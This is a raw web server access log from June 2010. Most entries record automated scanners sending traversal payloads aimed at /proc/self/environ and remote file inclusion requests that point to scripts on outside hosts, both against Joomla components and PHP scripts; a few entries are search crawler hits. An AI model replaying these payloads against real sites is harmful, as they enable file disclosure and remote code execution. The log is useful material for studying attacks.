62.67.244.57 - - [07/Jun/2010:05:44:41 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
67.195.112.180 - - [07/Jun/2010:05:45:12 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.146.255.196 - - [07/Jun/2010:05:53:43 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
62.67.244.57 - - [07/Jun/2010:05:53:52 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 363 "-""libwww-perl/5.803"
62.67.244.57 - - [07/Jun/2010:05:53:53 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
62.67.244.57 - - [07/Jun/2010:05:53:53 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
62.67.244.57 - - [07/Jun/2010:05:55:03 -0500] "GET /logs/access_log.1274313600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.iescantillana.es//modules/mod_gtranslate/image.jpg? HTTP/1.1" 404 363 "-""libwww-perl/5.803"
218.146.255.196 - - [07/Jun/2010:05:56:19 -0500] "GET /logs/access_log.1274832000/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:56:20 -0500] "GET /*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
218.146.255.196 - - [07/Jun/2010:05:56:20 -0500] "GET /logs/*.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.77.90 - - [07/Jun/2010:05:59:31 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:05:59:45 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:05:59:45 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:05:59:56 -0500] "GET /logs/index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
76.73.79.61 - - [07/Jun/2010:05:59:56 -0500] "GET /index2.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
69.175.14.66 - - [07/Jun/2010:06:01:09 -0500] "GET /logs/access_log.1271548800/lostpasswd.php?env[include_prefix]=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:06:01:09 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
69.175.14.66 - - [07/Jun/2010:06:01:09 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.alfarrabio.org//nucleus/xmlrpc/fx29id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
75.25.154.162 - - [07/Jun/2010:06:01:18 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:06:01:19 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.198.59.110 - - [07/Jun/2010:06:02:55 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
88.198.59.110 - - [07/Jun/2010:06:02:55 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
195.190.166.35 - - [07/Jun/2010:06:03:01 -0500] "GET /logs/templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.65"
195.190.166.35 - - [07/Jun/2010:06:03:01 -0500] "GET /templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.65"
174.121.77.90 - - [07/Jun/2010:06:03:15 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:03:22 -0500] "GET /logs/access_log.1274832000/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:03:22 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:03:22 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:03:24 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
91.121.164.97 - - [07/Jun/2010:06:03:40 -0500] "GET /logs/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.164.97 - - [07/Jun/2010:06:03:40 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
75.25.154.162 - - [07/Jun/2010:06:03:49 -0500] "GET /logs/index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
75.25.154.162 - - [07/Jun/2010:06:03:50 -0500] "GET /index2.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.77.90 - - [07/Jun/2010:06:03:51 -0500] "GET /logs/access_log.1274832000/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:03:51 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:03:51 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:04:59 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:05:31 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:05:31 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
188.72.70.56 - - [07/Jun/2010:06:05:44 -0500] "GET /logs/access_log.1274832000/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:05:44 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:05:45 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
174.121.77.90 - - [07/Jun/2010:06:06:46 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
211.251.222.135 - - [07/Jun/2010:06:07:04 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:07:05 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:07:05 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:07:08 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:07:08 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.251.222.135 - - [07/Jun/2010:06:07:09 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
188.72.70.56 - - [07/Jun/2010:06:07:52 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:07:52 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:07:53 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:07:53 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:06:08:22 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:06:08:22 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:06:08:22 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
174.121.77.90 - - [07/Jun/2010:06:08:42 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:08:42 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
209.188.90.44 - - [07/Jun/2010:06:09:13 -0500] "GET /logs/access_log.1274832000/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:06:09:14 -0500] "GET /?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:06:09:14 -0500] "GET /logs/?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
174.121.77.90 - - [07/Jun/2010:06:09:17 -0500] "GET /logs/access_log.1274832000/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:09:17 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:09:18 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
121.88.4.141 - - [07/Jun/2010:06:09:48 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:09:48 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:09:48 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/auto1.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:09:54 -0500] "GET ///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:09:54 -0500] "GET /logs/access_log.1271548800///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
121.88.4.141 - - [07/Jun/2010:06:09:54 -0500] "GET /logs///bbs///write_comment_update.php?board_skin_path=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.77.90 - - [07/Jun/2010:06:09:57 -0500] "GET /logs/access_log.1274832000/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:09:58 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:09:58 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
188.72.70.56 - - [07/Jun/2010:06:09:58 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:09:59 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
174.121.77.90 - - [07/Jun/2010:06:10:07 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:10:08 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
188.72.70.56 - - [07/Jun/2010:06:10:11 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:10:12 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:06:10:47 -0500] "GET /logs/access_log.1273363200/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:11:08 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:11:09 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:11:12 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:06:11:13 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
207.46.199.191 - - [07/Jun/2010:06:12:40 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.77.90 - - [07/Jun/2010:06:13:11 -0500] "GET /logs/access_log.1274832000/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:13:12 -0500] "GET /?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
174.121.77.90 - - [07/Jun/2010:06:13:12 -0500] "GET /logs/?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.810"
67.195.112.180 - - [07/Jun/2010:06:19:20 -0500] "GET /logs/access_log.1192233600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.73.147.76 - - [07/Jun/2010:06:19:43 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/includes/db/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
69.73.147.76 - - [07/Jun/2010:06:19:43 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/includes/db/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
69.73.147.76 - - [07/Jun/2010:06:19:43 -0500] "GET /logs/access_log.1271721600/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://td-uralsnab.ru/includes/db/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
83.223.118.6 - - [07/Jun/2010:06:19:53 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
83.223.118.6 - - [07/Jun/2010:06:19:53 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
83.223.118.6 - - [07/Jun/2010:06:19:53 -0500] "GET /logs/access_log.1271721600/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
216.14.126.220 - - [07/Jun/2010:06:20:18 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 362 "-""libwww-perl/5.833"
216.14.126.220 - - [07/Jun/2010:06:20:19 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 357 "-""libwww-perl/5.833"
83.223.118.6 - - [07/Jun/2010:06:20:22 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
83.223.118.6 - - [07/Jun/2010:06:20:22 -0500] "GET /logs/access_log.1271721600/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
83.223.118.6 - - [07/Jun/2010:06:20:22 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.elracodelangela.com//templates/beez/upload/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
88.191.94.188 - - [07/Jun/2010:06:22:30 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:06:22:30 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:06:22:46 -0500] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [07/Jun/2010:06:22:46 -0500] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.195.112.180 - - [07/Jun/2010:06:22:57 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
